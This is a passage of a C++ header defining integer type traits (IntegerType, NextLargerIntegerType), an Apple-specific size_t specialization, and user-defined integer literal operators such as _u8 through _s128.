static_assert(sizeof(NextSmallerIntegerType<uint64_t>::BT) == 4, "Bad type."); static_assert(sizeof(NextSmallerIntegerType<uint128_t>::BT) == 8, "Bad type."); #undef MAKE_SIGNED_INT_CHANGERS #undef MAKE_INT_TYPE template <> struct NextLargerIntegerType<uint128_t> { typedef uint128_t BT; }; template <> struct NextLargerIntegerType<int128_t> { typedef int128_t BT; }; // General integer type info. Useful for quickly changing between different // integer types. template <typename T> struct IntegerType { typedef typename BaseType<T>::BT BT; typedef typename UnsignedIntegerType<BT>::BT UT; typedef typename SignedIntegerType<BT>::BT ST; typedef typename NextLargerIntegerType<BT>::BT WBT; typedef typename UnsignedIntegerType<WBT>::BT WUT; typedef typename SignedIntegerType<WBT>::BT WST; enum : std::size_t { kNumBits = sizeof(BT) * 8 }; }; template <> struct IntegerType<bool> : public IntegerType<uint8_t> {}; #if __APPLE__ /* * In parts of the code, we create IntegerType<size_t>. * On OS X, size_t is the same as unsigned long, which is * 8 bytes. This code defines IntegerType for size_t. */ template <int> struct SizeTEquivalent; template <> struct SizeTEquivalent<4> { typedef IntegerType<uint32_t> T; }; template <> struct SizeTEquivalent<8> { typedef IntegerType<uint64_t> T; }; template <> struct IntegerType<size_t> : public SizeTEquivalent<sizeof(size_t)>::T {}; #endif // __APPLE__ #if !COMPILING_WITH_GCC inline uint8_t operator"" _u8(unsigned long long value) { return static_cast<uint8_t>(value); } inline uint16_t operator"" _u16(unsigned long long value) { return static_cast<uint16_t>(value); } inline uint32_t operator"" _u32(unsigned long long value) { return static_cast<uint32_t>(value); } inline uint64_t operator"" _u64(unsigned long long value) { return static_cast<uint64_t>(value); } inline uint64_t operator"" _addr_t(unsigned long long value) { return static_cast<addr_t>(value); } inline uint128_t operator"" _u128(unsigned long long value) { return static_cast<uint128_t>(value); } inline int8_t operator"" _s8(unsigned long long value) { return static_cast<int8_t>(value); } inline int16_t operator"" _s16(unsigned long long value) { return static_cast<int16_t>(value); } inline int32_t operator"" _s32(unsigned long long value) { return static_cast<int32_t>(value); } inline int64_t operator"" _s64(unsigned long long value) { return static_cast<int64_t>(value); } inline int128_t operator"" _s128(unsigned long long value) { return static_cast<int128_t>(value); } # define auto_t(T) typename BaseType<T>::BT #endif // COMPILING_WITH_GCC #pragma clang diagnostic pop